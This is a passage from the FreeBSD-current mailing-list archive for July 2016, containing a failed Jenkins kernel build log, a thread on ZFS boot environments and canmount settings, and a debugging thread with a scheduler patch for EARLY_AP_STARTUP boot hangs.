all_subdir_ntb --- =3D=3D=3D> ntb (all) --- all_subdir_ntb/ntb --- =3D=3D=3D> ntb/ntb (all) --- machine --- machine -> /builds/FreeBSD_HEAD_amd64_gcc/sys/amd64/include --- x86 --- x86 -> /builds/FreeBSD_HEAD_amd64_gcc/sys/x86/include --- ntb_if.h --- awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/tools/makeobjops.awk /builds/Free= BSD_HEAD_amd64_gcc/sys/dev/ntb/ntb_if.m -h --- ntb_if.c --- awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/tools/makeobjops.awk /builds/Free= BSD_HEAD_amd64_gcc/sys/dev/ntb/ntb_if.m -c --- device_if.h --- awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/tools/makeobjops.awk /builds/Free= BSD_HEAD_amd64_gcc/sys/kern/device_if.m -h --- bus_if.h --- awk -f /builds/FreeBSD_HEAD_amd64_gcc/sys/tools/makeobjops.awk /builds/Free= BSD_HEAD_amd64_gcc/sys/kern/bus_if.m -h --- ntb_if.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.ntb_if.o -MTntb_if.o= -mcmodel=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-async= hronous-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -W= all -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-proto= types -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -ffor= mat-extensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unkn= own-pragmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunu= sed-but-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-error= =3Dmaybe-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wn= o-error=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes -W= no-error=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -fm= s-extensions --param inline-unit-growth=3D100 --param large-function-growth= =3D1000 -std=3Diso9899:1999 -c ntb_if.c -o ntb_if.o ctfconvert -L VERSION -g ntb_if.o --- ntb.o --- /usr/local/bin/x86_64-portbld-freebsd10.1-gcc -isystem /builds/FreeBSD_HEAD= _amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/include -L/builds/Free= BSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp/usr/lib --sysroot= =3D/builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/tmp -B/= usr/local/x86_64-freebsd/bin/ -O2 -pipe -fno-strict-aliasing -D_KERNEL -DK= LD_MODULE -nostdinc -DHAVE_KERNEL_OPTION_HEADERS -include /builds/FreeBSD= _HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC/opt_global.h = -I. -I/builds/FreeBSD_HEAD_amd64_gcc/sys -fno-common -g -fno-omit-frame-poi= nter -mno-omit-leaf-frame-pointer -I/builds/FreeBSD_HEAD_amd64_gcc/obj/buil= ds/FreeBSD_HEAD_amd64_gcc/sys/GENERIC -MD -MF.depend.ntb.o -MTntb.o -mcmo= del=3Dkernel -mno-red-zone -mno-mmx -mno-sse -msoft-float -fno-asynchronou= s-unwind-tables -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -W= redundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes = -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -fformat-ex= tensions -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-pr= agmas -Wno-error=3Dinline -Wno-error=3Denum-compare -Wno-error=3Dunused-bu= t-set-variable -Wno-error=3Daggressive-loop-optimizations -Wno-error=3Dmay= be-uninitialized -Wno-error=3Darray-bounds -Wno-error=3Daddress -Wno-erro= r=3Dcast-qual -Wno-error=3Dsequence-point -Wno-error=3Dattributes -Wno-err= or=3Dstrict-overflow -Wno-error=3Doverflow -finline-limit=3D8000 -fms-exte= nsions --param inline-unit-growth=3D100 --param large-function-growth=3D100= 0 -std=3Diso9899:1999 -c /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb/nt= b/../../../dev/ntb/ntb.c -o ntb.o --- all_subdir_nfsd --- ctfconvert -L VERSION -g nfs_nfsdsubs.o --- all_subdir_ntb --- In file included from /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb/ntb/..= /../../dev/ntb/ntb.c:27:0: /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb/ntb/../../../dev/ntb/ntb.c: = In function 'ntb_get_ctx': /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb/ntb/../../../dev/ntb/ntb.c:2= 69:12: error: 'struct ntb_child' has no member named 'ntb_ctx' KASSERT(nc->ntb_ctx !=3D NULL && nc->ctx_ops !=3D NULL, ("bogus")); ^ /builds/FreeBSD_HEAD_amd64_gcc/sys/sys/cdefs.h:456:51: note: in definition = of macro '__predict_false' #define __predict_false(exp) __builtin_expect((exp), 0) ^ /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb/ntb/../../../dev/ntb/ntb.c:2= 69:2: note: in expansion of macro 'KASSERT' KASSERT(nc->ntb_ctx !=3D NULL && nc->ctx_ops !=3D NULL, ("bogus")); ^ *** [ntb.o] Error code 1 bmake[5]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb/ntb 1 error bmake[5]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb/ntb *** [all_subdir_ntb/ntb] Error code 2 bmake[4]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb 1 error bmake[4]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/ntb *** [all_subdir_ntb] Error code 2 bmake[3]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules --- all_subdir_netgraph --- ctfconvert -L VERSION -g ng_nat.o A failure has been detected in another branch of the parallel make bmake[5]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netgraph/na= t *** [all_subdir_netgraph/nat] Error code 2 bmake[4]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netgraph 1 error bmake[4]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/netgraph *** [all_subdir_netgraph] Error code 2 bmake[3]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules --- all_subdir_nfsd --- --- nfs_nfsdstate.o --- ctfconvert -L VERSION -g nfs_nfsdstate.o A failure has been detected in another branch of the parallel make bmake[4]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules/nfsd *** [all_subdir_nfsd] Error code 2 bmake[3]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules 3 errors bmake[3]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/sys/modules *** [modules-all] Error code 2 bmake[2]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD= _amd64_gcc/sys/GENERIC 1 error bmake[2]: stopped in /builds/FreeBSD_HEAD_amd64_gcc/obj/builds/FreeBSD_HEAD= _amd64_gcc/sys/GENERIC *** [buildkernel] Error code 2 bmake[1]: stopped in /builds/FreeBSD_HEAD_amd64_gcc 1 error bmake[1]: stopped in /builds/FreeBSD_HEAD_amd64_gcc *** [buildkernel] Error code 2 make: stopped in /builds/FreeBSD_HEAD_amd64_gcc 1 error make: stopped in /builds/FreeBSD_HEAD_amd64_gcc Build step 'Execute shell' marked build as failure [WARNINGS] Skipping publisher since build result is FAILURE IRC notifier plugin: Sending notification to: #freebsd-commits Email was triggered for: Failure - Any Sending email for trigger: Failure - Any From owner-freebsd-current@freebsd.org Thu Jul 28 12:45:29 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id C6D25BA58F9 for ; Thu, 28 Jul 2016 12:45:29 +0000 (UTC) (envelope-from avg@FreeBSD.org) Received: from citapm.icyb.net.ua (citapm.icyb.net.ua [212.40.38.140]) by mx1.freebsd.org (Postfix) with ESMTP id EC8B8159C; Thu, 28 Jul 2016 12:45:28 +0000 (UTC) (envelope-from avg@FreeBSD.org) Received: from porto.starpoint.kiev.ua (porto-e.starpoint.kiev.ua [212.40.38.100]) by citapm.icyb.net.ua (8.8.8p3/ICyb-2.3exp) with ESMTP id PAA23259; Thu, 28 Jul 2016 15:45:25 +0300 (EEST) (envelope-from avg@FreeBSD.org) Received: from localhost ([127.0.0.1]) by porto.starpoint.kiev.ua with esmtp (Exim 4.34 (FreeBSD)) id 1bSkgn-000EgY-Dj; Thu, 28 Jul 2016 15:45:25 +0300 Subject: Re: Boot environments and zfs canmount=noauto To: Allan Jude , freebsd-current@FreeBSD.org, rwestlun@gmail.com References: <20160728020548.GD26793@gmail.com> <5e49ab87-65ff-fe20-1e50-387e3484cc47@FreeBSD.org> From: Andriy Gapon Message-ID: Date: Thu, 28 Jul 2016 15:44:48 +0300 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <5e49ab87-65ff-fe20-1e50-387e3484cc47@FreeBSD.org> Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 12:45:29 -0000 I also would like to add, just in case, that I never set a BE's mountpoint to '/'. I leave it at its default value like /pond/ROOT/foobar. When the BE is active it would be mounted at / anyway. And when it is not active and I want to access it for some modifications, etc, then I can mount it simply with zfs mount and have it at a non-interfering location. Ditto for its subordinate datasets. I am saying this, because it seems that that is not how the FreeBSD installer ("zfsboot") configures the default BE that it creates. I am not sure what sysutils/beadm expects and configures in this regard. I use my own custom script for doing beadm-like things. On 28/07/2016 13:34, Andriy Gapon wrote: > On 28/07/2016 05:18, Allan Jude wrote: >> On 2016-07-27 22:05, Randy Westlund wrote: >>> I'm trying to follow Michael Dexter's post about using bhyve with boot >>> environments. It involves moving all child datasets under >>> zroot/ROOT/default, so that you can have entirely independent systems. >>> >>> http://callfortesting.org/bhyve-boot-environments/ >>> >>>> Let's change the datasets with "canmount on" to "canmount noauto": >>>> [snip] >>>> Considering that this setting is harmless to a system with a single >>>> boot environment, I would not object to it being the default. Hint >>>> hint. >>> >>> When I set all the datasets with canmount=on to canmount=noauto, only >>> zroot/ROOT/default gets mounted on next boot. It's my understanding >>> that 'zfs mount -a' doesn't mount datasets with canmount=noauto, but if >>> I leave them with canmount=on, they will try to mount regardless of >>> which BE is active. >>> >>> I'm trying this with 11.0-BETA2. Can sometime tell me what I'm missing? >>> >> >> You are not missing anything. This is why the default is to have all >> files that are specific to a BE be in the root dataset, and only files >> that are global (like home directory, etc) be outside of the BE. > > Locally I have the following rc script to handle subordinate datasets of > a boot environment: http://dpaste.com/0Q0JPGN.txt > It is designed for exactly the scenario described above. > The script is automatically enabled when zfs_enable is enabled. > > It would probably make sense to include the script into the OS after > some testing and a review. > -- Andriy Gapon From owner-freebsd-current@freebsd.org Thu Jul 28 12:59:11 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 2B3B1BA5B81 for ; Thu, 28 Jul 2016 12:59:11 +0000 (UTC) (envelope-from 000.fbsd@quip.cz) Received: from elsa.codelab.cz (elsa.codelab.cz [94.124.105.4]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 99A151C94; Thu, 28 Jul 2016 12:59:09 +0000 (UTC) (envelope-from 000.fbsd@quip.cz) Received: from elsa.codelab.cz (localhost [127.0.0.1]) by elsa.codelab.cz (Postfix) with ESMTP id 9794228428; Thu, 28 Jul 2016 14:59:07 +0200 (CEST) Received: from illbsd.quip.test (ip-86-49-16-209.net.upcbroadband.cz [86.49.16.209]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by elsa.codelab.cz (Postfix) with ESMTPSA id 51A072840C; Thu, 28 Jul 2016 14:59:06 +0200 (CEST) Message-ID: <579A019A.4090400@quip.cz> Date: Thu, 28 Jul 2016 14:59:06 +0200 From: Miroslav Lachman <000.fbsd@quip.cz> User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:35.0) Gecko/20100101 Firefox/35.0 SeaMonkey/2.32 MIME-Version: 1.0 To: Andriy Gapon , Allan Jude , freebsd-current@FreeBSD.org, rwestlun@gmail.com Subject: Re: Boot environments and zfs canmount=noauto References: <20160728020548.GD26793@gmail.com> <5e49ab87-65ff-fe20-1e50-387e3484cc47@FreeBSD.org> In-Reply-To: Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 12:59:11 -0000 Andriy Gapon wrote on 07/28/2016 14:44: > > I also would like to add, just in case, that I never set a BE's > mountpoint to '/'. I leave it at its default value like > /pond/ROOT/foobar. When the BE is active it would be mounted at / > anyway. And when it is not active and I want to access it for some > modifications, etc, then I can mount it simply with zfs mount and have > it at a non-interfering location. Ditto for its subordinate datasets. > > I am saying this, because it seems that that is not how the FreeBSD > installer ("zfsboot") configures the default BE that it creates. I am > not sure what sysutils/beadm expects and configures in this regard. I > use my own custom script for doing beadm-like things. beadm works with the following layout NAME USED AVAIL REFER MOUNTPOINT sys 10.8G 3.63G 96K none sys/ROOT 1.45G 3.63G 96K none sys/ROOT/b4pupg_20160516 8K 3.63G 606M / sys/ROOT/b4pupg_20160523 8K 3.63G 621M / sys/ROOT/b4pupg_20160531 8K 3.63G 643M / sys/ROOT/b4pupg_20160616 8K 3.63G 649M / sys/ROOT/b4pupg_20160627 8K 3.63G 655M / sys/ROOT/b4supd_20160523 8K 3.63G 621M / sys/ROOT/b4supd_20160728 8K 3.63G 664M / sys/ROOT/default 1.45G 3.63G 663M / sys/tmp 104K 3.63G 104K /tmp sys/usr 7.42M 3.63G 96K none sys/usr/home 6.72M 3.63G 6.72M /usr/home sys/usr/obj 96K 3.63G 96K /usr/obj sys/usr/ports 428K 3.63G 332K /usr/ports sys/usr/ports/distfiles 96K 3.63G 96K /usr/ports/distfiles sys/usr/src 96K 3.63G 96K /usr/src sys/var 9.31G 3.63G 96K none sys/var/audit 96K 3.63G 96K /var/audit sys/var/log 9.31G 3.63G 9.31G /var/log sys/var/tmp 152K 3.63G 152K /var/tmp Note mountpoint "none" on sys/usr and sys/var. They are not mounted intermediate directories, because /usr and /var should be part of the BE, but some subdirectories should not be part of BE. BEs under sys/ROOT have this properties # zfs get all | grep mount sys mounted no - sys mountpoint none local sys canmount on default sys/ROOT mounted no - sys/ROOT mountpoint none inherited from sys sys/ROOT canmount on default sys/ROOT/b4pupg_20160516 mounted no - sys/ROOT/b4pupg_20160516 mountpoint / local sys/ROOT/b4pupg_20160516 canmount off local sys/ROOT/b4pupg_20160523 mounted no - sys/ROOT/b4pupg_20160523 mountpoint / local sys/ROOT/b4pupg_20160523 canmount off local sys/ROOT/b4pupg_20160531 mounted no - sys/ROOT/b4pupg_20160531 mountpoint / local sys/ROOT/b4pupg_20160531 canmount off local sys/ROOT/b4pupg_20160616 mounted no - sys/ROOT/b4pupg_20160616 mountpoint / local sys/ROOT/b4pupg_20160616 canmount off local sys/ROOT/b4pupg_20160627 mounted no - sys/ROOT/b4pupg_20160627 mountpoint / local sys/ROOT/b4pupg_20160627 canmount off local sys/ROOT/b4supd_20160523 mounted no - sys/ROOT/b4supd_20160523 mountpoint / local sys/ROOT/b4supd_20160523 canmount off local sys/ROOT/b4supd_20160728 mounted no - sys/ROOT/b4supd_20160728 mountpoint / local sys/ROOT/b4supd_20160728 canmount off local sys/ROOT/default mounted yes - sys/ROOT/default mountpoint / local sys/ROOT/default canmount on default Miroslav Lachman From owner-freebsd-current@freebsd.org Thu Jul 28 13:21:58 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 2709CBA66A1 for ; Thu, 28 Jul 2016 13:21:58 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 195D61277; Thu, 28 Jul 2016 13:21:58 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 5DEDD152; Thu, 28 Jul 2016 13:21:48 +0000 (UTC) Date: Thu, 28 Jul 2016 13:21:42 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1480713631.39.1469712103022.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <775180052.32.1469700645055.JavaMail.jenkins@jenkins-9.freebsd.org> References: <775180052.32.1469700645055.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #489 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 13:21:58 -0000 See From owner-freebsd-current@freebsd.org Thu Jul 28 15:15:26 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id B4207BA602D for ; Thu, 28 Jul 2016 15:15:26 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from mailman.ysv.freebsd.org (mailman.ysv.freebsd.org [IPv6:2001:1900:2254:206a::50:5]) by mx1.freebsd.org (Postfix) with ESMTP id A0F831CB8 for ; Thu, 28 Jul 2016 15:15:26 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: by mailman.ysv.freebsd.org (Postfix) id A01CCBA602C; Thu, 28 Jul 2016 15:15:26 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 9FBA7BA602B for ; Thu, 28 Jul 2016 15:15:26 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from bigwig.baldwin.cx (bigwig.baldwin.cx [IPv6:2001:470:1f11:75::1]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 4D3781CB7 for ; Thu, 28 Jul 2016 15:15:26 +0000 (UTC) (envelope-from jhb@freebsd.org) Received: from ralph.baldwin.cx (c-73-231-226-104.hsd1.ca.comcast.net [73.231.226.104]) by bigwig.baldwin.cx (Postfix) with ESMTPSA id 69385B923; Thu, 28 Jul 2016 11:15:24 -0400 (EDT) From: John Baldwin To: gljennjohn@gmail.com Cc: current@freebsd.org Subject: Re: EARLY_AP_STARTUP hangs during boot Date: Thu, 28 Jul 2016 08:09:23 -0700 Message-ID: <2422336.Il5kZkSCC0@ralph.baldwin.cx> User-Agent: KMail/4.14.3 (FreeBSD/10.3-STABLE; KDE/4.14.3; amd64; ; ) In-Reply-To: <20160728003131.1f67bb78@ernst.home> References: <20160516122242.39249a54@ernst.home> <1758017.P1iqL9uSnF@ralph.baldwin.cx> <20160728003131.1f67bb78@ernst.home> MIME-Version: 1.0 Content-Transfer-Encoding: 7Bit Content-Type: text/plain; charset="us-ascii" X-Greylist: Sender succeeded SMTP AUTH, not delayed by milter-greylist-4.2.7 (bigwig.baldwin.cx); Thu, 28 Jul 2016 11:15:24 -0400 (EDT) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 15:15:26 -0000 On Thursday, July 28, 2016 12:31:31 AM Gary Jennejohn wrote: > On Wed, 27 Jul 2016 14:43:36 -0700 > John Baldwin wrote: > > > On Tuesday, June 07, 2016 12:06:54 PM Gary Jennejohn wrote: > > > On Tue, 31 May 2016 13:10:06 -0700 > > > John Baldwin wrote: > > > > > > > On Saturday, May 28, 2016 02:11:41 PM Gary Jennejohn wrote: > > > > > On Fri, 27 May 2016 09:50:05 +0200 > > > > > Gary Jennejohn wrote: > > > > > > > > > > > On Thu, 26 May 2016 16:54:35 -0700 > > > > > > John Baldwin wrote: > > > > > > > > > > > > > On Tuesday, May 17, 2016 06:47:41 PM Gary Jennejohn wrote: > > > > > > > > On Mon, 16 May 2016 10:54:19 -0700 > > > > > > > > John Baldwin wrote: > > > > > > > > > > > > > > > > > On Monday, May 16, 2016 12:22:42 PM Gary Jennejohn wrote: > > > > > > > > > > I tried out EARLY_AP_STARTUP, but the kernel hangs and I can't > > > > > > > > > > break into DDB. > > > > > > > > > > > > > > > > > > > > I did a verbose boot and the last lines I see are related to routing > > > > > > > > > > MSI-X to various local APIC vectors. I copied the last few lines and > > > > > > > > > > they look like this: > > > > > > > > > > > > > > > > > > > > msi: routing MSI-X IRQ 256 to local APIC 2 vector 48 > > > > > > > > > > msi: routing MSI-X IRQ 257 to local APIC 3 vector 48 > > > > > > > > > > msi: routing MSI-X IRQ 258 to local APIC 4 vector 48 > > > > > > > > > > msi: routing MSI-X IRQ 256 to local APIC 0 vector 49 > > > > > > > > ^^^^^^^ Assigning > > > > > > > > > > > > > > > > > > > > I tried disabling msi and msix in /boot/loader.conf, but the settings > > > > > > > > > > were ignored (probabaly too early). > > > > > > > > > > > > > > > > > > No, those settings are not too early. However, the routing to different > > > > > > > > > CPUs now happens earlier than it used to. What is the line before the > > > > > > > > > MSI lines? You can take a picture with your phone/camera if that's simplest. > > > > > > > > > > > > > > > > > > > > > > > > > Here a few lines before the MSI routing happens: > > > > > > > > > > > > > > > > hpet0: iomem 0xfed00000-0xfed003ff irq 0,8 on acpi0 > > > > > > > > hpet0: vendor 0x4353, rev 0x1, 14318180 Hz, 3 timers, legacy route > > > > > > > > hpet0: t0 : irqs 0x00c0ff (0), MSI, periodic > > > > > > > > hpet0: t1 : irqs 0x00c0ff (0), MSI, periodic > > > > > > > > hpet0: t2 : irqs 0x00c0ff (0), MSI, periodic > > > > > > > > Timecounter "HPET" frequency 14318180 Hz quality 950 > > > > > > > > > > > > > > The assigning message means it is in the loop using > > > > > > > bus_bind_intr() to setup per-CPU timers. Can you please try > > > > > > > setting 'hint.hpet.0.per_cpu=0' at the loader prompt to see if > > > > > > > disabling the use of per-CPU timers allows you to boot? > > > > > > > > > > > > > > > > > > > Something has changed since the last time I generated a kernel with > > > > > > this option. > > > > > > > > > > > > Now I get a NULL-pointer dereference in the kernel, doesn't matter > > > > > > whether I set the hint or not. > > > > > > > > > > > > > > > > OK, now that the startup has been fixed, I tried setting the hint at > > > > > the loader prompt, but the kenel hangs in exactly the same place as > > > > > before. I actually booted twice to make certain I hadn't made a > > > > > typo when setting the hint. > > > > > > > > Humm, it shouldn't be calling bus_bind_intr() if the hint is set. Actually, > > > > I guess it just binds them all to first CPU if per-CPU timers aren't set. > > > > Can you add debug printfs to hpet_attach() in sys/dev/acpica/acpi_hpet.c to > > > > narrow down which line in that function it hangs after? > > > > > > > > Another option to try is to add the following to your kernel config: > > > > > > > > options KTR > > > > options KTR_COMPILE=KTR_PROC > > > > options KTR_MASK=KTR_PROC > > > > options KTR_VERBOSE=1 > > > > > > > > this will spew a lot of crap to the screen, but if it stops spewing when it > > > > hangs then it might be tell us where the system is hung. If you have any way > > > > to configure a serial console then this would also be useful even if it spews > > > > constantly when it is hung (assuming you could log the output of the serial > > > > console). > > > > > > > > > > I used the KTR options. > > > > > > After the Timecounter "HPET" frequency 14318180 Hz quality 950 I see > > > > > > cpu0 mi_switch: old thread 10000 (swapper) > > > cpu0 mi_switch: new thread 10022 (if_config_tqg_0) > > > cpu0 sleep_broadcast(0x80002f9a600, 0) > > > cpu0 msleep_spin: old thread 100022 > > > cpu0 mi_switch: old thread 10022 > > > cpu0 mi_switch: new thread 10016 (if_io_tqg_0) > > > cpu0 sleep_broadcast(0x80002f9a780, 0) > > > cpu0 msleep_spin: old thread 10016 > > > cpu0 mi_switch: old thread 10016 > > > cpu0 fork_exit: new thread 0x80004239510 (td_sched 0x8000042399d8, pid > > > 10, idle: cpu0) > > > > > > And that's all that came out, really not very much at all. > > > > Ok, that seems odd. > > > > Can you apply this patch and run with the KTR output still: > > > > Index: sched_ule.c > > =================================================================== > > --- sched_ule.c (revision 303397) > > +++ sched_ule.c (working copy) > > @@ -1904,6 +1904,13 @@ sched_switch(struct thread *td, struct thread *new > > td->td_owepreempt = 0; > > if (!TD_IS_IDLETHREAD(td)) > > tdq->tdq_switchcnt++; > > + > > + if (td == &thread0 && cold) { > > + printf("thread0 switching out (ts_cpu %d):\n", ts->ts_cpu); > > + kdb_backtrace(); > > + MPASS(TD_IS_RUNNING(td)); > > + } > > + > > /* > > * The lock pointer in an idle thread should never change. Reset it > > * to CAN_RUN as well. > > @@ -1920,6 +1927,9 @@ sched_switch(struct thread *td, struct thread *new > > if (THREAD_CAN_MIGRATE(td) && !THREAD_CAN_SCHED(td, ts->ts_cpu)) > > ts->ts_cpu = sched_pickcpu(td, 0); > > #endif > > + if (td == &thread0 && cold) > > + printf("thread0 ts_cpu %d, cpuid %d\n", ts->ts_cpu, > > + cpuid); > > if (ts->ts_cpu == cpuid) > > tdq_runq_add(tdq, td, srqflag); > > else { > > > > > > Well, now I know that ULE is a prerequiste for EARLY_AP_STARTUP! I > wasn't aware of that. I prefer BSD and that's the scheduler I did > the first tests with. > > But with the ULE scheduler the system comes up all the way. > > It would be nice if the BSD scheduler could also be modified to > work with EARLY_AP_STARTUP. No, ULE is not a prerequisite. However, I will do some testing with 4BSD to see what I need to fix. Thanks! I suspect the early sched_bind that happens when migrating x86 interrupts due to bus_bind_intr() is causing the issue. -- John Baldwin From owner-freebsd-current@freebsd.org Thu Jul 28 16:07:02 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id CFEBFBA7953 for ; Thu, 28 Jul 2016 16:07:02 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id C223116E8; Thu, 28 Jul 2016 16:07:02 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 03037157; Thu, 28 Jul 2016 16:06:52 +0000 